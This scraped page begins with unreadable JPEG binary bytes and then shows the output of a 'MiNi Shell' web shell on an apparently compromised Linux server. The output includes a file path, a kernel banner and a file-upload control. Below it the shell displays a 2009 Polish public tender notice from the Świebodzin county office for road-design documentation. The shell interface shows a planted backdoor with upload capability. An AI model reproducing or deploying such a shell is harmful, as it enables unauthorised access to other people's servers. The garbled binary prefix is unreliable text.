JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090414/103122-N-2009.html

<p class="kh_header"><b>Świebodzin: Wykonanie dokumentacji projektowo-kosztorysowej na dwa zadania drogowe</b><br>
<b>Numer ogłoszenia: 103122 - 2009; data zamieszczenia: 14.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Kolejowa 2, 66-200 Świebodzin, woj. lubuskie, tel. 068 4755307, faks 068 4755305.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swiebodzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej na dwa zadania drogowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowych wraz z pełnieniem nadzoru autorskiego dotyczących następujących zadań:
I.	Przebudowa drogi powiatowej nr 1231F Wilkowo - Borów - Ołobok z podziałem na trzy etapy - łączna długość ok. 6.110 km
a)	Wilkowo (od drogi krajowej nr 2) do miejscowości Borów 
b)	miejscowość Borów 
c)	od miejscowości Borów - do skrzyżowania z drogą powiatową nr 1223F w miejscowości Ołobok
II. Przebudowa drogi powiatowej nr 1225F Skąpe - Rokitnica - Węgrzynice - Niedźwiedź - Toporów oraz odcinek od granicy powiatu kierunek Gryżyna do miejscowości Węgrzynice (skrzyżowanie z drogą powiatową nr 1226F) - łączna długość ok. 23.768 km z podziałem na następujące etapy:
a)	od skrzyżowania z drogą wojewódzką nr 276 do skrzyżowania z droga powiatową 
nr 1227F
b)	od skrzyżowania z drogą powiatową nr 1227F do Rokitnicy (łącznie ze skrzyżowaniem) - do skrzyżowania z drogą powiatową nr 1228F, możliwość podziału na dodatkowe etapy
c)	od skrzyżowania z drogą powiatową nr 1228F do końca Rokitnicy (wyjazd w kierunku Węgrzynic) 
d)	od Rokitnicy do Węgrzynic - do skrzyżowania z drogą powiatową nr 1226F 
e)	od skrzyżowania z drogą powiatową nr 1226F do Niedźwiedzia 
f)	miejscowość Niedźwiedź
g)	od miejscowości Niedźwiedź do Toporowa 
h)	miejscowość Toporów 
i)	miejscowość Węgrzynice - w ciągu dróg 1226F, 1225F oraz 1157F
j)	od granicy powiatu kierunek Gryżyna do miejscowości Węgrzynice (skrzyżowanie 
z drogą powiatową nr 1226F) 

2. Szczegółowy zakres:
I.	Przebudowa drogi powiatowej nr 1231F Wilkowo - Borów - Ołobok z podziałem na trzy etapy - łączna długość ok. 6.110 km
a)	Wilkowo (od drogi krajowej nr 2) do miejscowości Borów - przebudowa drogi
b)	miejscowość Borów - przebudowa drogi
c)	od miejscowości Borów - do skrzyżowania z drogą powiatową nr 1223F w miejscowości Ołobok - przebudowa nawierzchni bitumicznej
II.	Przebudowa drogi powiatowej na 1225F Skąpe - Rokitnica - Węgrzynice - Niedźwiedź - Toporów oraz odcinek od granicy powiatu kierunek Gryżyna do miejscowości Węgrzynice (skrzyżowanie z drogą powiatową nr 1226F) - łączna długość ok. 23.768 km z podziałem na następujące etapy:
a)	od skrzyżowania z drogą wojewódzką nr 276 do skrzyżowania z droga powiatową 
nr 1227F - remont, regeneracja nawierzchni / odnowa warstwy ścieralnej
b)	od skrzyżowania z drogą powiatową nr 1227F do Rokitnicy (łącznie ze skrzyżowaniem) - przebudowa drogi do skrzyżowania z drogą powiatową nr 1228F - remont, możliwość podziału na dodatkowe etapy
c)	od skrzyżowania z drogą powiatową nr 1228F do końca Rokitnicy (wyjazd 
w kierunku Węgrzynic) - przebudowa drogi
d)	od Rokitnicy do Węgrzynic - do skrzyżowania z drogą powiatową nr 1226F - przebudowa drogi
e)	od skrzyżowania z drogą powiatową nr 1226F do Niedźwiedzia - przebudowa drogi
f)	miejscowość Niedźwiedź - przebudowa drogi
g)	od miejscowości Niedźwiedź do Toporowa - przebudowa drogi
h)	miejscowość Toporów - remont, przebudowa drogi
i)	miejscowość Węgrzynice - -w ciągu dróg 1226F, 1225F oraz 1157F - przebudowa drogi
j)	od granicy powiatu kierunek Gryżyna do miejscowości Węgrzynice (skrzyżowanie 
z drogą powiatową nr 1226F) - przebudowa drogi

3. Zamawiający wymaga etapowania wykonania dokumentacji projektowo - kosztorysowej:
I.	Przebudowa drogi powiatowej nr 1231F Wilkowo - Borów - Ołobok z podziałem na trzy etapy - łączna długość ok. 6.110 km
a)	Wilkowo (od drogi krajowej nr 2) do miejscowości Borów 
b)	miejscowość Borów 
c)	od miejscowości Borów - do skrzyżowania z drogą powiatową nr 1223F 
w miejscowości Ołobok
II.	Przebudowa drogi powiatowej nr 1225F Skąpe - Rokitnica - Węgrzynice - Niedźwiedź - Toporów oraz odcinek od granicy powiatu kierunek Gryżyna do miejscowości Węgrzynice (skrzyżowanie z drogą powiatową nr 1226F)  - łączna długość ok. 23.768 km z podziałem na następujące etapy:
a)	od skrzyżowania z drogą wojewódzką nr 276 do skrzyżowania z droga powiatową 
nr 1227F
b)	od skrzyżowania z drogą powiatową nr 1227F do Rokitnicy (łącznie ze skrzyżowaniem) - do skrzyżowania z drogą powiatową nr 1228F, możliwość podziału na dodatkowe etapy
c)	od skrzyżowania z drogą powiatową nr 1228F do końca Rokitnicy (wyjazd w kierunku Węgrzynic) 
d)	od Rokitnicy do Węgrzynic - do skrzyżowania z drogą powiatową nr 1226F 
e)	od skrzyżowania z drogą powiatową nr 1226F do Niedźwiedzia 
f)	miejscowość Niedźwiedź
g)	od miejscowości Niedźwiedź do Toporowa 
h)	miejscowość Toporów 
i)	miejscowość Węgrzynice - w ciągu dróg 1226F, 1225F oraz 1157F
j)	od granicy powiatu kierunek Gryżyna do miejscowości Węgrzynice (skrzyżowanie 
z drogą powiatową nr 1226F) 

4. Na całych projektowanych odcinkach należy przewidzieć wymagane odwodnienie. Opracowanie dokumentacji projektowo - kosztorysowych powinno pozwalać na późniejsze etapowanie robót budowlanych. Oferent zobowiązany jest do dokonania wcześniejszej wizji lokalnej w terenie obejmującym przedmiot zamówienia.

5. Wykonanie dokumentacji projektowo - kosztorysowej powinno zawierać:
a)	pozyskanie map, wszelkich opinii, uzgodnień i oświadczeń niezbędnych 
do zrealizowania przedmiotu zamówienia np. raportu oddziaływania na środowisko, decyzji lokalizacyjnej, pozwolenia na budowę itp.,
b)	wykonanie badań istniejącej konstrukcji jezdni,
c)	projektu budowlano - wykonawczego,
d)	odwodnienie drogi,
e)	usunięcie ewentualnych kolizji z istniejącym uzbrojeniem,
f)	wykonanie kosztorysów inwestorskich i przedmiarów robót dla oferentów 
z podziałem na branże zgodnej z programem kosztorysowym NORMA 
lub podobnym,
g)	wykonanie szczegółowej specyfikacji technicznej wykonania i odbioru robót,
h)	projekt stałej i czasowej organizacji ruchu.
6. Dokumenty zawarte w pkt a) do e) oraz pkt g) do h) należy wykonać w wersji papierowej 
6 egz. oraz wersji elektronicznej w formacie pdf. (Adobe Reader) dla każdego etapu poszczególnego zadania.
7. Dokumenty zawarte w pkt f) należy wykonać w wersji papierowej 2 egz. + wersja elektroniczna w formacie xls. (Excel) dla każdego etapu poszczególnego zadania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wraz ze złożeniem oferty do wniesienia wadium na zadanie Przebudowa drogi powiatowej nr 1231F Wilkowo-Borów-Ołobok w wysokości 7.000,00  złotych (słownie: siedem tysięcy złotych), a na zadanie Przebudowa drogi powiatowej nr 1225F Skąpe-Rokietnica- Węgrzynice- Niedźwiedz - Toporów oraz odcinek od granicy powiatu kierunek Gryżyna do miejscowości Węgrzynice w wysokości 4.000,00 złotych (słownie: cztery tysiące złotych) zgodnie z art. 45 ustawy w jednej lub kilku następujących formach: 
1) pieniądzu ;	
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz.275).
Wadium wnoszone  w pieniądzu należy wpłacić przelewem na konto Starostwa Powiatowego BZ WBK oddział  w Świebodzinie, Nr 31 1090 1593 0000 0001 0828 2407 z dopiskiem .

WAŻNE !!
Wadium w pieniądzu wnosi się przed terminem składania ofert. Wadium uznaje się za wniesione w terminie jeżeli do wyznaczonej godziny i daty składania ofert kwota wadium znajduje się na koncie zamawiającego.

 Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
Zamawiający zwraca niezwłocznie wadium jeżeli :
1)	upłynął termin związania ofertą;
2)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
3)	zamawiający unieważnił postępowanie o udzielenie zamówienia , a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Z zastrzeżeniem art. 46 ust. 4a ustawy PZP zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy :
1)	który wycofał ofertę przed upływem terminu składania ofert;
2)	który został wykluczony z postępowania ;
3)	którego oferta została odrzucona.

Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
Zdeponowane u Zamawiającego wadium wniesione w formie innej niż przelew gotówkowy, po zakończonej procedurze przetargowej zakończonej podpisaniem umowy, Wykonawcy winni odebrać w Wydziale Dróg w Starostwie Powiatowym - Weronika Gałązka mł referent w Wydziale Dróg przy ul. Kolejowej 2 osobiście. 

Uwaga! Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca ,którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego  na warunkach określonych 
w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy ;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:

a.	posiadają uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004r.

Zamawiający żąda, w formie oryginału lub kserokopii poświadczonej za zgodność 
z oryginałem przez wykonawcę, następujących dokumentów (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców każdy z nich musi złożyć niżej wymienione dokumenty):

- aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

- aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne lub zaświadczenia, 
że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
- wykazu wykonanych usług (dokumentacji projektowych) oraz dokumentów potwierdzających, że oferent lub oferenci ubiegający się wspólnie o udzielenie zamówienia zrealizowali samodzielnie lub wspólnie w rozumieniu art. 23 ustawy Prawo zamówień publicznych, usługi w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zadania odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia o wartości 
co najmniej 300.000,00 złotych brutto (słownie: trzysta tysięcy złotych). Wykonawcy winni załączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie, np. referencje lub protokoły odbioru - wg wzoru stanowiącego załącznik nr 4 do SIWZ;
- wykaz wykonanych usług (dokumentacji projektowych) musi zawierać: zakres opracowania i jego wartość, datę rozpoczęcia i odbioru prac projektowych, nazwę, adres i telefon inwestora.

Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.

- wykazu osób i podmiotów, które będą wykonywać zamówienie oraz będą uczestniczyć 
w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wg wzoru stanowiącego załącznik nr 5 do SIWZ;

Wykaz osób i podmiotów musi zawierać następujące dane i dokumenty:
- imiona i nazwiska osób, które będą brały udział w pracach projektowych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych wraz z ich uprawnieniami wymaganymi przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2006r. nr 156, poz. 1118 z późn. zm.) oraz przepisami wykonawczymi z nią związanymi,
- zaświadczenia z właściwej izby samorządu zawodowego dla ww. osób, potwierdzających ich przynależność do izby oraz posiadanie wymaganego ubezpieczenia od odpowiedzialności cywilnej na dzień składania ofert. Zamawiający dopuszcza, jako dokument równoważny, złożenie nieaktualnego zaświadczenia z ww. izby wraz z dowodem dokonania wpłaty należnych składek, z którego wynika, że są one opłacone na dzień składania ofert.

- dysponują osobami zdolnymi do wykonania zamówienia, tj. wymagane są osoby mogące wykonywać samodzielne funkcje techniczne w budownictwie posiadające odpowiednie, zgodne z przepisami uprawnienia w specjalności: 
-     drogowej i przynależeć do właściwej okręgowej izby inżynierów budownictwa,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych i przynależeć do właściwej okręgowej izby inżynierów budownictwa,
- instalacyjnej w zakresie sieci wodociągowych i urządzeń kanalizacyjnych i przynależeć do właściwej izby inżynierów budownictwa.

Wykonawca, który wykaże osoby, którymi będzie dysponował ma obowiązek przedstawić pisemne zobowiązanie innego podmiotu do udostępnienia osób zdolnych do wykonania zamówienia.

c. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

 - informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, na kwotę co najmniej 300.000,00 tysięcy złotych (słownie: trzysta tysięcy złotych),

W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch 
lub więcej wykonawców ich sytuacja ekonomiczno - finansowa będzie oceniana łącznie.
Wartość przedmiotu umowy należy określić na podstawie formularza ofertowego - wg wzoru stanowiącego załącznik nr 1 do SIWZ;

2. Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt IX SIWZ. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż wyżej wymienione warunki są przez wykonawcę spełnione. Uzupełnienie wymaganych dokumentów jest możliwe po upływie terminu składania ofert zgodnie z art. 26 ust. 3 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na podstawie art. 26 ust. 1, w celu potwierdzenia, że Wykonawca spełnia warunki udziału 
w postępowaniu o udzielenie zamówienia publicznego Zamawiający żąda następujących dokumentów:
a.	posiadają uprawnienia do wykonywania określonej działalności lub czynności 
oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004r.

Zamawiający żąda, w formie oryginału lub kserokopii poświadczonej za zgodność 
z oryginałem przez wykonawcę, następujących dokumentów (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców każdy z nich musi złożyć niżej wymienione dokumenty):

- aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

- aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
- wykazu wykonanych usług (dokumentacji projektowych) oraz dokumentów potwierdzających, że oferent lub oferenci ubiegający się wspólnie o udzielenie zamówienia zrealizowali samodzielnie lub wspólnie w rozumieniu art. 23 ustawy Prawo zamówień publicznych, usługi w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zadania odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia o wartości 
co najmniej 300.000,00 złotych brutto (słownie: trzysta tysięcy złotych). Wykonawcy winni załączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie, np. referencje lub protokoły odbioru - wg wzoru stanowiącego załącznik nr 4 do SIWZ;

- wykazu osób i podmiotów, które będą wykonywać zamówienie oraz będą uczestniczyć 
w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wg wzoru stanowiącego załącznik nr 5 do SIWZ;

c. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
- informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, na kwotę co najmniej 300.000,00 tysięcy złotych (słownie: trzysta tysięcy złotych),

Wartość przedmiotu umowy należy określić na podstawie formularza oferty - wg wzoru stanowiącego załącznik nr 1 do SIWZ;

Inne dokumenty: 
1.	Oświadczenie o treści określonej w art. 22 ust. 1 oraz art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych - według wzoru stanowiącego załącznik nr 3 do SIWZ. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców każdy z nich musi złożyć stosowne oświadczenie.
2.	Pełnomocnictwo - jeśli dotyczy, pełnomocnictwo należy załączyć w formie oryginału lub kopii poświadczonej przez notariusza - ustanowienie pełnomocnika do reprezentowania wykonawców (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców) w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego, które w szczególności powinno:
- jednoznacznie określać postępowanie do którego się odnosi,
- precyzować zakres umocowania,
- wskazywać pełnomocnika,
- wyliczać wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia,
- być podpisane przez każdego wykonawcę.
3. Stosowne pełnomocnictwo, które należy załączyć w formie oryginału lub kopii poświadczonej przez notariusza, do podpisania oferty w sytuacji, w której uprawnienie do podpisania oferty nie wynika z zapisu w rejestrze lub ewidencji.
Na ofertę oprócz ww. dokumentów i oświadczeń składają się również:
- formularz ofertowy - wg wzoru stanowiącego załącznik nr 1 do SIWZ 
- projekt umowy - według wzoru stanowiącego załącznik nr 2 do SIWZ (winien być zaakceptowany i podpisany przez upoważnionego przedstawiciela oferenta)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.swiebodzin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, ul. Piłsudskiego 18, pok. 3, 66-200 Świebodzin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 11:00, miejsce: Starostwo Powiatowe, ul. Kolejowa 2, 66-200 Świebodzin, sekretariat I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowo - kosztorysowej na przebudowę drogi powiatowej nr 1231F Wilkowo-Borów-Ołobok.</p>
